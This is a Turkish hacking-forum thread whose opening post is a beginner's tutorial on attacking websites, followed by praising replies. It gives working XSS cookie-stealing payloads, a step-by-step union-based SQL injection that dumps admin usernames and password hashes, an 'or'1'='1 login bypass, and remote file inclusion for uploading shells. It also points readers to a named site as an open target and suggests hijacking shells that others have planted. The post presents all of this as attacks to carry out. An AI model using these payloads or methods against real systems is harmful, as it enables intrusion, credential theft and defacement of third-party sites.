Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Hacking'e yeni başlıyanlar ?
#1
Merhaba arkadaşlar,
Bu Makalemde hacking'e yeni başlıyanlar için öğrenilmesi gerek bazı anlatıcağım ???

Şu Konuları anlatıcağım ?
1-) Xss Açığı ?
2-) Sql Açığı(Geniş Anlatım) ?
3-) Php Açıkları ?
Ve Saldırı yöntemleri ?



1-) Xss Açığı
Arkadaşlar Xss açığı hakkında pek fazla birşey anlatmıyacağım çünkü xss açığı çok basit bir açıktır Google'dan araştırırak çok kolay öğrenebilirsiniz ama ben ne olur ne olmaz bilmeyenler vardır diye
hemen üzerinden kısaca bir giriş yapıcağım ?


Xss açığı nerelerde bulunabilir ?
Xss açığı veri giriş yapılan yerler'de bulabilir mesela arama motorları,yorum yapılan alanlar ve linkler'de...
Şimdi biz Xss açığı varmı yokmu anlamak için sayfanın kaynağına bakarız, komutları inceleriz bu yöntem pek uygulanmaz yani komutlar'dan xss açığı nasıl oluşuruz bunu yeni başlıyanlar bilmez birde bu yöntem pek hızlı olmaz, Komutlar'la uğraşmamak için hızlı xss açığını öğrenmek için veri girişi yapılan alanlar
Html veya Javascript komutlarını yazarız ... eğer Çalıştırıyorsa açık vardır örnek olarak bir web sitesine girdik diyelim orada arama motoruna şu komuyu yazıyoruz ..


Kod:
<script>alert("El Zara"); </script>
Eğer Ekrana El Zara hatası verdiriyorsa açık vardır verdirmiyorsada hemen yok demiyelim çünkü daha değişik yöntemler'de var mesela yukarıdaki kodu encode çevirerek'de deneriz...

Sadece arama motorlarında bu açığı aramıyalım link'lerdede arıyalım ...
Örnek olarak aşağıdaki gibi bir sitemiz var ...


Kod:
www.elzara.com/hakkımızda.php?page=3a
Biz burada 3a kısmını silip yerine html veya Javascript komutlarını yazarız...

Kod:
www.elzara.com/hakkımızda.php?page="><script>alert(document.cookie); </script>
Yukarıdaki link'de cookie bilgilerimizi hata verdirerek yazmasını istedik ...

Arkadaşlar şöyle birşey var biz bu komutları yazdık diyelim bu komutlar ekrana çıktı ee sayfayı yenilediğimizde komutlar gitti önemsiz diyeceksiniz ama hiçde önemsiz değil Xss açığı çok önemli bir açıktır... sql hacking gibi yöntemler'den bile daha iyidir bana göre...

Şimdi bu Xss saldırılarını siz anlatıcağım ?
Mesela xss açıklı site var elimizde şimdi biz orada Yorum bölümünü arıyoruz yorum bölümü varsa çok güzel olucak çünkü oraya javascript komutlarımızın hepsini çalıştırabiliriz örnek olarak biz oraya yönlendirme komutu yazabiliriz mesela kendi index'imizi yönlendirebiliriz veya kendi zararlı yazılımlarımıza yönlendirebilirsiz sınırsız kullanıcıya zarar verebiliriz...

Xss'in en önemli saldırısı ise admin ve kullanıcı cookie bilgisini almaktır bu cookie bilgileri ile kullanıcı adı ve şifre yazmadan web siteye giriş yapabiliriz. bu konuyu daha iyi araştırmak için Xss sniffer konusunu araştırın ben yakın bir zamanda xss sniffer yapma ve yedirme videosu çekiceğim bilginize burada onun için yazarak anlatmıyorum ???
Eğer xss sniffer konusunu iyice merak ettiyseniz benide beklemek istemiyorsanız aşağıda xss sniffer yapma ve xss sniffer konusunda çeşitli linkler vericeğim ...


Xss sniffer yapma: http://vimeo.com/44193038
Xss sniffer hazırlama: http://www.youtube.com/watch?v=cB1pW32_in8
Yakında kendi videomu çekiceğim eğitim seti yapıcam bilginize ...


2-) Sql açığı
Sql açığı ise veritabanında oluşan açıklar'dır bu açıklarını anlamak için id değerinin numarasının sonuna Tek tırnak( ' ) işareti koyarız ....
Örnek =
Kod:
http://www.elzara.com/index.php?id=331'
Gördüğünüz gibi 331 rakamından sonra web site tırnak koyduğum eğer web sitesinde mysql hatası veriyorsa Veya sayfadaki yazılar,resimler eksiliyorsa demekki o site'de Sql açığı vardır ama bir sürü sql hacking yöntemi vardır ben size burada bir kaç yöntem göstericeğim eğer sql hacking konusunda uzman biri olmayı istiyorsanız Mysql programlama dilini öğrenebilirsiniz ...

Aşağıdaki komutumuzda web site'den hata alıyoruz ...
Kod:
www.örneksite.com/index.php?id=12'

Hata verdi şimdi kolon sayısını bulalım ..... gereken komut +order+by+1-- Komutudur Bu Komu bilgisayar söyle anlıyor "Kolon sayım 1" eğer 1 tane kolonu varsa hata vermez şöyle yapalım ...
+order+by+2-- Bu sefer'de hata vermedi Bilgisayar bu komutu söyle anladı "Kolon sayım 2" demekki site'de 2 tane kolon varmış bütün kolon numarasını bulmak için hata verene kadar gideceğim hata verenin bir önceki kolon sayısı bütün kolonumuzdur yani bir burada

Kod:
+order+by+1-- yaptık hata vermedi
+order+by+2-- yaptık hata vermedi
+order+by+3-- yaptık hata vermedi
+order+by+4-- yaptık hata vermedi
+order+by+5-- yaptık hata verdi ...
Demekki tüm kolonları 4'müş 5 kolon yokmuş.. şimdi site üzerinde deniyelim
Kod:
www.örneksite.com/index.php?id=12+order+by+1-- Hata vermedi.
www.örneksite.com/index.php?id=12+order+by+2-- Hata vermedi.
www.örneksite.com/index.php?id=12+order+by+3-- Hata vermedi.
www.örneksite.com/index.php?id=12+order+by+4-- Hata vermedi.
www.örneksite.com/index.php?id=12+order+by+5--  Hata verdi...
Şimdi biz bütün kolon numarasının 4 olduğunu öğrendik şimdi bu kolonları çekelim gelsin kiss
Gereken komutumuz +union+select+1,2,3,4,5-- ben buraya 1,2,3,4,5 yazdım çünkü kolon numaram 5..
Başka bir sitede kolon numarası değişebilir siz ona göre ayarlayın ...


şimdi bunu site üzerinde deniyorum
Kod:
www.örneksite.com/index.php?id=12+union+select+1,2,3,4,5--
Şimdi biz bu komutu yazdık site'de hiç bir hata çıkmadı birşey olmadı şimdi biz buradan rakam almamız gerek ekrana rakam yansıması gerek normalde +union+select+1,2,3,4,5-- yazdığımızda bazen o sayı çıkar bazen çıkmaz eğer çıkmadıysa veya çıktıysada siz id numarasının başına her zaman bir tire işareti atın( - )
örnek

Kod:
www.örneksite.com/index.php?id=-12+union+select+1,2,3,4,5--

Şimdi ekrana 3 numarası vurdu biz bu numaraya bakalım burada sql tablolarını çekiceğiz...
İlk olarak version öğreniyorum gereken komutumuz @@version veya version()


Kod:
www.örneksite.com/index.php?id=-12+union+select+1,2,@@version,4,5--
Bu komut bize version'u verir örnek olarak 5-cl gibi bir version verdi şimdi ben bu version nedir pek fazla anlatmıyacağım ama version'un ne olduğunu zamanla öğrenirsiniz bazı version'larda bilgiler alabilirsiniz bazılarında alamassınız çeşitli yöntemler denersiniz bunları Sql konusunda ilerledikçe görürsünüz...

şimdi site'de toplu tablo adı çekelim komutları iyi bakın bol bol komutları inceleyin ne yaptım her ayrıntısına kadar.
Kod:
www.örneksite.com/index.php?id=-12+union+select+1,2,group_concat(table_name),4,5+from+information_schema.tables--
Bunu yazdık'dan sonra ekrana tablolar geldi büyük olan tablolar bizi ilgilendirmez küçük olan tablolara bakıcağız... admin tablosunu bulamadıysak başka bir yöntem deniyeceğiz..

Kod:
www.örneksite.com/index.php?id=-12+union+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=database()--

Bunu yazdıktan sonra ekrana şu tablolar çıktı ...
resim,id,numara,telefon,admin,personel,mesaj
bunların her biri tablo birisi numara tablosu diğer mesaj tablosu biride admin tablosu şimdi biz bu admin tablosuna girelim kiss kiss


Kod:
www.örneksite.com/index.php?id=-12+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=admin--

Bunu yazdık entera bastık ama hiç birşey çıkmadı üst taraf'da admin direk yazdık bu hata admin yazan yeri hexlememiz lazım...
bu siteye girip admin kısmını hexliyoruz : http://paulschou.com/tools/xlate/

Kod:
61 64 6d 69 6e bu numaraları birleştiriyoruz başına 0x koyuyoruz 0x61646d696e

Kod:
www.örneksite.com/index.php?id=-12+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=0x61646d696e--
ve ekrana username,password,id çıktı şimdi biz buradan username ve password çekelim..


Kod:
www.örneksite.com/index.php?id=-12+union+select+1,2,group_concat(username,3d,password),4,5+from+admin--

yazıyoruz karşıma

admin=13asda1231
çıktı birincisi admin olarak zaten username yazdık = kısmında sonra olan yerde md5 şifresi bu md5 şifresini hazır md5 kırıcılar ile kıırabilirsiniz bütün md5 şifreleri kırılmaz ona göre kiss

SQL kullanıcı giriş sistem açığı ?
Bu açıklar kullanıcı giriş sisteminde olur mesela web yöneticisi giriş sistemi yaparken ' ve , gibi karekterleri filtrelememişse o zaman buraya kullanıcı adı ve şifre olmadan giriş yapabiliriz örnek olarak bir site'nin admin panelindeyiz

Kod:
username:'or'1'='1
password:'or'1'='1
Ad ve şifre kısmında şu komutu yazdık 'or'1'='1 eğer admin giriş panelinin güvenliğini almamışsa sisteme admin olarak giriş yapar bu komut sayesinde bu komutun anlamınıda bilgisayar şöyle anlıyor
şifrem 1 veya 1 ise giriş yap...
örnek olarak size bir tane kullanılmayan site vericem admin panel açıklı burada deniyebilirsiniz...

Kod:
site: http://www.aghukuk.org/admin/
burada açık mevcuttur..

3-) Php Açıkları
Bu konuda size RFI yönetminden bahsediceğim LFI konusunu anlatmıyacağım ...

RFI ?
Uzaktan dosya çağırma'dır türkçesi size anlatmadan hemen komutlar üzerinde nasıl bulunur onu
Göstericeğim.


RFI NASIL OLUŞURUZ ?
Mesela
Kod:
include ("$haberler/hacker/elzara.php");
bunun gibi tanımlanmamış bir komut yazdığımızda uzaktan dosya Çağırmamız mümkündür.
Kod:
<?php
$haberler/hacker/elzara.php =’tanımlı değer’
include ("$haberler/hacker/elzara.php");
?>
Bu şekilde tanımlı bir komut oluşturduk... güvenilir.

Şimdi biz burada nasıl bir zarar veririz


şöyle bir sitemiz olsun
http://www.örneksite.com/adas.php?id=10 Biz buraya
http://www.örneksite.com/adas.php?id=htt...google.com yazdığımızda siteye google geldiyse veya sadece google'dan bir kaç özellik eklediyse o zaman rfı açığı vardır biz buraya shell'de yüklüyebiliriz..

Kod:
www.elzara.com/index.php?id=http://shelladresi.com
Elzara.com'da açık varsa siteye shell yüklenebilir kiss gerisi size kalmış ...

Birde arkadaşlar basit açıklar'dan oluşan saldırı yöntemleri vardır php ile alakası yoktur Şimdi analtıcağım konunun başlık atmadan yazıyorum ...

Arama motorun'dan /upload.html yazdığımızda bir sitede uplaod yeri çıkıyorsa oraya shell yüklüyebiliriz...
veya birisi bir sisteme shell atmışsa onuda bulabiliriz üstüne kendi index'imizi atabiliriz örnek olarak bir
Wordpress site'sindeki shell uzantısı /wp-content/themes/twentyten/404.php Biz bunu google'da aratarak bu adresler'de shell ararız ve başkasının attığı shell'e index'de çakabiliriz tabi bu yöntemler lamer'lar içindir kiss kiss kiss eğer yeni başladıysanız butür yöntemlerle kendinizi tatmin edebilirsiniz....
Bunun gibi birçok yöntem var ama ellerim ağrıdır yazamıyorum..

Not: 2,3 Yıldır hiç konuda anlatmadım buda ilk konu paylaşımımdır bir çok hata yapmışımdır kusuruma bakmayın birde burada biraz zor gelebilir sizlere yakında eğitim seti çekicem bu konularda içinde olucak burada anlamadıysanız yapıcağım eğitim setinde mutkalaka bunları öğrenirsiniz görsel olucak ...
Beğenenler:
#2
Lütfen Alıntı Konuları Altıntı Diye Belirtiniz!!! .. Eline Sağlık Yinede..
Beğenenler:
#3
Hocam alıntı değil kendi paylaşımım elerim ağrıdı bunları yazana kadar.
Beğenenler:
#4
eline sağlık. yeniler için en iyisi sql açıgı bana göre.
Beğenenler:
#5
Hacker peyami sanmiyorum alinti olsun, iyi anlatmis guzel anlatmis zaten okudugunda yazilari yanlis felan yazmis ordan da belli oluyo kiss

Eline saglik
Beğenenler:
#6
teşşekürler
Beğenenler:
#7
Yeniler icin süper olacak bir dökuman eline saglık..
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  WP Brute v2 Yeni Program ERTUĞRUL 39 931 04-12-2016, Saat: 14:18
Son Yorum: Henkel
  Yeni Kolay Site Hack :) ByMuh4mm3d 200 5,415 04-12-2016, Saat: 12:27
Son Yorum: 03yunus03
  Hacking Amaçlı Whois Kullanımı CyberHacker 0 39 03-12-2016, Saat: 09:52
Son Yorum: CyberHacker
  SuspendedPage.Cgi Hacking Yöntemi Konu Anlatım KingSkrupellos 5 139 30-11-2016, Saat: 11:07
Son Yorum: Efetimi
  Web Hacking Yöntemleri 204 Adet ( Cyberizm'e Özel Hazırlanmıştır) KingSkrupellos 30 2,899 27-11-2016, Saat: 12:44
Son Yorum: Dragon Caliph
Anahtar Kelimeler

Hacking'e yeni başlıyanlar ? indir, Hacking'e yeni başlıyanlar ? Videosu, Hacking'e yeni başlıyanlar ? Online izle, Hacking'e yeni başlıyanlar ? Bedava indir, Hacking'e yeni başlıyanlar ? Yükle, Hacking'e yeni başlıyanlar ? Hakkında, Hacking'e yeni başlıyanlar ? Nedir, Hacking'e yeni başlıyanlar ? Free indir, Hacking'e yeni başlıyanlar ? Oyunu, Hacking'e yeni başlıyanlar ? Download


1 Ziyaretçi